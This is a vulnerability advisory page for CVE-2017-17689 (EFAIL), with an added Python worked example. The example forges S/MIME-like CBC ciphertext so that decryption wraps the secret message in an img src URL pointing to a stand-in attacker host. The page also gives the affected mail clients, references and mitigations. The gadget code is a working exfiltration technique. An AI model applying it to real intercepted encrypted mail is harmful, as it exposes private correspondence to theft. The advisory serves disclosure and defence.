Vulnerability Description
The S/MIME specification encrypts message bodies with Cipher Block Chaining (CBC) mode and no integrity protection. Because CBC is malleable, an attacker who knows a single plaintext block (S/MIME bodies begin with a predictable MIME header) can rewrite an intercepted ciphertext so that it decrypts to attacker-chosen content, such as HTML that wraps the victim's decrypted message in a URL to an attacker-controlled server. When the mail client decrypts and renders the HTML, it exfiltrates the plaintext. This is the CBC gadget variant of the attack known as EFAIL.
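The following is an added worked example of the CBC malleability gadget; it is not code from efail.de or from any of the listed vendors. A small SHA-256-based Feistel block cipher (a hypothetical stand-in, since the gadget depends only on CBC's structure and not on the block cipher) replaces AES, and the message, key, IV and the assumed known first block are constructed sample data. The attacker-side functions `cbc_gadget` and `forge_exfil_ciphertext` never touch the key: given the IV, the first ciphertext block and its known plaintext, they build ciphertext pairs whose second block decrypts to a chosen value, at the cost of one uncontrolled garbage block per pair.

```python
"""EFAIL-style CBC malleability gadget against an S/MIME-like CBC ciphertext.

Added example, not code from efail.de or a listed vendor. A toy 16-byte Feistel
block cipher built from SHA-256 (an assumption) stands in for AES-CBC; the
gadget relies only on CBC's structure, not on the block cipher.
"""
import hashlib

BLOCK = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    # Round function of the toy cipher (stand-in for AES, not a real design).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in range(8):
        l, r = r, xor(l, _f(key, r, rnd))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(8)):
        l, r = xor(r, _f(key, l, rnd)), l
    return l + r


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    # Plain CBC: P_i = D(C_i) XOR C_{i-1}. There is no integrity check,
    # which is exactly what the gadget exploits.
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out.append(xor(block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)


# --- attacker side: operates without the key ---
def cbc_gadget(iv: bytes, c0: bytes, known_p0: bytes, chosen: bytes) -> bytes:
    """Return two blocks (X, C0) such that C0 decrypts to `chosen` after X.

    Since C0 = E(P0 XOR IV), D(C0) = P0 XOR IV. Choosing X = IV XOR P0 XOR chosen
    gives D(C0) XOR X = chosen. X itself decrypts to an uncontrolled garbage block.
    """
    return xor(xor(iv, known_p0), chosen) + c0


def forge_exfil_ciphertext(iv, ciphertext, known_p0, prefix_blocks, suffix_blocks):
    """Wrap the victim's ciphertext in attacker-chosen blocks using gadgets.

    Layout after decryption: chosen, garbage, chosen, ..., garbage (old IV),
    original plaintext blocks intact, garbage, chosen.
    """
    c0 = ciphertext[:BLOCK]
    stream = b"".join(cbc_gadget(iv, c0, known_p0, b) for b in prefix_blocks)
    stream += iv + ciphertext  # old IV becomes one garbage block; P0.. survive
    stream += b"".join(cbc_gadget(iv, c0, known_p0, b) for b in suffix_blocks)
    return stream[:BLOCK], stream[BLOCK:]  # first block serves as the new IV


# --- constructed sample data (not a real captured message) ---
KEY = b"victim-key-16byt"
IV = bytes(range(16))
MESSAGE = b"Content-type: text/plain\r\n\r\nSecret: meet at 9pm."  # 48 bytes
KNOWN_P0 = MESSAGE[:BLOCK]  # assumption: leading MIME header is predictable
PREFIX = [b'<img ignore="'.ljust(BLOCK), b'" src="http://a/']
SUFFIX = [b'">'.ljust(BLOCK)]


def run_attack() -> bytes:
    """Encrypt as the sender would, forge as the attacker, decrypt as the victim."""
    ct = cbc_encrypt(KEY, IV, MESSAGE)
    fiv, fct = forge_exfil_ciphertext(IV, ct, KNOWN_P0, PREFIX, SUFFIX)
    return cbc_decrypt(KEY, fiv, fct)  # what the victim's client would render


if __name__ == "__main__":
    print(run_attack())
```

The decrypted output places the secret message inside the `src` attribute of an `<img>` tag, so a client that loads remote content sends it to the attacker's host. The garbage blocks are unavoidable; the real attack hides them inside quoted attributes (here the `ignore="..."` attribute) and may need retries when a garbage block happens to contain a quote character. The underlying fix is integrity protection of the ciphertext (authenticated encryption) rather than any change to the block cipher, and the client-side mitigations in the efail.de advisory, such as not loading remote content, cut off the exfiltration channel.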
CVSS Score
5.9 (MEDIUM)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| 9Folders | Nine | - |
| Apple | Mail | - |
| Bloop | Airmail | - |
| Emclient | Emclient | - |
| Flipdogsolutions | Maildroid | - |
| Freron | Mailmate | - |
| Gnome | Evolution | - |
| Google | Gmail | - |
| Horde | Horde Imp | - |
| Ibm | Notes | - |
| Kde | Kmail | - |
| Kde | Trojita | - |
| Microsoft | Outlook | 2007 |
| Mozilla | Thunderbird | - |
| Postbox-Inc | Postbox | - |
| R2Mail2 | R2Mail2 | - |
| Ritlabs | The Bat | - |
References
- http://www.securityfocus.com/bid/104165 (Third Party Advisory, VDB Entry)
- https://efail.de (Exploit, Mitigation, Third Party Advisory)
- https://news.ycombinator.com/item?id=17066419 (Issue Tracking, Third Party Advisory)
- https://pastebin.com/gNCc8aYm (Third Party Advisory)
- https://twitter.com/matthew_d_green/status/996371541591019520 (Third Party Advisory)
- https://www.synology.com/support/security/Synology_SA_18_22 (Third Party Advisory)
FAQ
What is CVE-2017-17689?
CVE-2017-17689 is a vulnerability with a CVSS score of 5.9 (MEDIUM). The S/MIME specification allows a Cipher Block Chaining (CBC) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL.
How severe is CVE-2017-17689?
CVE-2017-17689 has been rated MEDIUM with a CVSS base score of 5.9/10. The attack requires an attacker who can intercept or obtain an encrypted message and a recipient whose client decrypts it and loads remote content from the resulting HTML.
Is there a patch for CVE-2017-17689?
Check the references section above for vendor advisories and patch information; the efail.de advisory also lists client-side mitigations, such as disabling remote content loading and HTML rendering in the mail client. Affected products include: 9Folders Nine, Apple Mail, Bloop Airmail, Emclient Emclient, Flipdogsolutions Maildroid, and the other clients in the table above.